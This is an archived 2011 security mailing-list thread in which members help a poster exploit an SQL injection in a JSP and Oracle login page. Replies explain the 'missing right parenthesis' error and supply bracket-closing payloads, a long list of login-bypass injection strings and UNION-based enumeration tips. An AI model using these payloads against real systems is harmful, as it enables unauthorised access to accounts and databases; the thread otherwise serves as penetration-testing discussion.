Oracle SQL injection
654 views
Skip to first unread message
8a8a
May 17, 2011, 2:24:14 PM5/17/11
to null-...@googlegroups.com
I am working on web application running in JSP and oracle in backend.
I found SQL injection in login page but not be able to exploit it.
While trying standard SQL injection parameter like.
a' or '1'='1
a' or 1=1--
etc....
I am getting java exception with below error.
ORA-00907: missing right parenthesis
Didn't get much idea from Google.
Any body has any idea to of possibility of exploiting it?
I found SQL injection in login page but not be able to exploit it.
While trying standard SQL injection parameter like.
a' or '1'='1
a' or 1=1--
etc....
I am getting java exception with below error.
ORA-00907: missing right parenthesis
Didn't get much idea from Google.
Any body has any idea to of possibility of exploiting it?
Yash Kadakia
May 17, 2011, 2:28:04 PM5/17/11
to null-...@googlegroups.com
Decode the secret message "missing right parenthesis".
Yash
--
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
This list is supported by Institute of Information Security http://iisecurity.in
Learn information security at your own pace – eLearning programs at http://elearning.iisecurity.in
Yash
Yash Kadakia
Office: +91-022-23612909
Office: +1-347-99-ITSEC (+1-347-994-8732)
Mobile: +91-9833375290
Blog: http://www.yashkadakia.com/
Sent on my BlackBerry® from Vodafone
From: 8a8a <8a8a...@gmail.com>
Sender: null-...@googlegroups.com
Date: Tue, 17 May 2011 23:54:14 +0530
ReplyTo: null-...@googlegroups.com
Subject: [null] Oracle SQL injection
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
This list is supported by Institute of Information Security http://iisecurity.in
Learn information security at your own pace – eLearning programs at http://elearning.iisecurity.in
Anant Shrivastava
May 17, 2011, 2:33:06 PM5/17/11
to null-...@googlegroups.com
could be coz of the SQL procedures being used internally.
just my two cents. i am in no ways an expert on this.
Anant Shrivastava
CEH | RHCE
Mob : 91-9764899904
E-mail : an...@anantshri.info
Web : http://anantshri.info
8a8a
May 17, 2011, 2:47:28 PM5/17/11
to null-...@googlegroups.com
> Decode the secret message "missing right parenthesis"
It looks simple by error message something like syntax error in SQL statement/query but how we can confirm that using login page.
I tried all the possible options but every time getting some error.
I tried all the possible options but every time getting some error.
I am sure there is no typo in standard SQL injection parameters I am trying.
Yash Kadakia
May 17, 2011, 2:54:48 PM5/17/11
to null-...@googlegroups.com
"missing right parenthesis" literally means missing right bracket. That means your query prior to the injection point contained a opening bracket but your injection string did not provide a closing bracket and instead provided a comment or query terminator.
Simply put you need something like: a' or 'a' = 'a')--
Simply put you need something like: a' or 'a' = 'a')--
Yash Kadakia
Office: +91-022-23612909
Office: +1-347-99-ITSEC (+1-347-994-8732)
Mobile: +91-9833375290
Blog: http://www.yashkadakia.com/
Sent on my BlackBerry® from Vodafone
From: 8a8a <8a8a...@gmail.com>
Sender: null-...@googlegroups.com
Date: Wed, 18 May 2011 00:17:28 +0530
ReplyTo: null-...@googlegroups.com
Subject: Re: [null] Oracle SQL injection
Raxit Sheth
May 17, 2011, 2:53:21 PM5/17/11
to null-...@googlegroups.com
http://sla.ckers.org/forum/read.php?16,33603,33622 Or just google
"sqli missing right parenthesis" without quotes
"sqli missing right parenthesis" without quotes
8a8a
May 17, 2011, 3:11:11 PM5/17/11
to null-...@googlegroups.com
@Raxit,
Already gone through that link but non of the options worked.
@Yash
Will try this statement as well lets see If it work.
Already gone through that link but non of the options worked.
@Yash
Will try this statement as well lets see If it work.
TAS
May 18, 2011, 12:13:04 AM5/18/11
to null-...@googlegroups.com
Did it work?
Sent from BlackBerry® - Vodafone
Date: Wed, 18 May 2011 00:41:11 +0530
41 w4r10r
May 18, 2011, 12:18:49 AM5/18/11
to null-...@googlegroups.com
i dont know if you have this strings with you already, but try this if you dont have them and specially strings with brackets....
admin'--
x' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
admin'--
x' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
TAS
May 18, 2011, 1:14:25 AM5/18/11
to null-...@googlegroups.com
To put you on the right track of thought. This is an error based SQL
Injection but in Oracle. Now that you have identified the injection
point you have to inject the query you want to run and get the output.
Injection but in Oracle. Now that you have identified the injection
point you have to inject the query you want to run and get the output.
Let me know if you got it working.
-
TAS
http://twitter.com/p0wnsauc3
anuj gupta
May 18, 2011, 12:44:51 AM5/18/11
to null-...@googlegroups.com
just try the cheet sheet given on hackers.org
--
Anuj Gupta
On Tue, May 17, 2011 at 11:54 PM, 8a8a <8a8a...@gmail.com> wrote:
--
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
This list is supported by Institute of Information Security http://iisecurity.in
Learn information security at your own pace – eLearning programs at http://elearning.iisecurity.in
--
Anuj Gupta
Dhiraj Ranka
May 18, 2011, 1:40:34 AM5/18/11
to null-...@googlegroups.com
You can try this cheat sheet for Oracle
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
As you are getting error then I guess you can try for union injection to enumerate more information about the Oracle database.
for SQL and MySQL
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
update us with which injection worked for you.
--
Be in my web world,
http://dhirajranka.com/
http://twitter.com/dhirajranka/
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
As you are getting error then I guess you can try for union injection to enumerate more information about the Oracle database.
for SQL and MySQL
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
update us with which injection worked for you.
--
Be in my web world,
http://dhirajranka.com/
http://twitter.com/dhirajranka/
sachins...@gmail.com
May 18, 2011, 2:47:41 AM5/18/11
to p0wn...@gmail.com, null-...@googlegroups.com
Hi,
first give the valid input and try to close the bracket and then you can execute the query
input) ; then query
try possible combos
like
)input
----------
Sent via Nokia Email
------Original message------
From: TAS <p0wn...@gmail.com>
To: <null-...@googlegroups.com>
Date: Wednesday, May 18, 2011 10:44:25 AM GMT+0530
Subject: Re: [null] Oracle SQL injection
sachins...@gmail.com
May 18, 2011, 2:48:31 AM5/18/11
to p0wn...@gmail.com, null-...@googlegroups.com
Srry on phone ............::)
8a8a
May 18, 2011, 6:44:06 AM5/18/11
to null-...@googlegroups.com, p0wn...@gmail.com
Not working....
While trying below input...
') or UPPER('a')=UPPER('a
or
') or ('x'='x
not getting any SQL error but it says invalid user or password....
cons0ul
May 18, 2011, 8:39:15 AM5/18/11
to null-...@googlegroups.com
try UNION like
valid_input UNION SQL QUERY ') --
It will be good if you able to find what procedure or function gives the error
Rascal♥♥♥
May 18, 2011, 9:08:31 PM5/18/11
to null-...@googlegroups.com
Hmm , the the basic auth pass usually used as u mentioned a' or '1'='1 works quite well for many login pages , but it is dependent upon your jsp code and how do you perform the login ,
say
if i use the following approach to process the login say ,
pass = "select password from login where uname = "+uname
if(pass==givenpass)
then
login
else
error
the normal sql injection as u said if given
say username = a' or '1'='1 and password = a' or '1'='1 ,
this approach causes problem when comparing the retrieved password with orginal password and doesnt login in , but if i give
username = a' or union select 'sample
password = sample
i get login inside ,
so your injection must depend upon the code you used in the login , so analayse the code so that u can get a sql injection string for it
--
-Vengadanathan
say
if i use the following approach to process the login say ,
pass = "select password from login where uname = "+uname
if(pass==givenpass)
then
login
else
error
the normal sql injection as u said if given
say username = a' or '1'='1 and password = a' or '1'='1 ,
this approach causes problem when comparing the retrieved password with orginal password and doesnt login in , but if i give
username = a' or union select 'sample
password = sample
i get login inside ,
so your injection must depend upon the code you used in the login , so analayse the code so that u can get a sql injection string for it
On Tue, May 17, 2011 at 11:54 PM, 8a8a <8a8a...@gmail.com> wrote:
--
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
This list is supported by Institute of Information Security http://iisecurity.in
Learn information security at your own pace – eLearning programs at http://elearning.iisecurity.in
--
-Vengadanathan
"I am ready to change the world , but no one is ready to give the source code .."
Reply all
Reply to author
Forward
0 new messages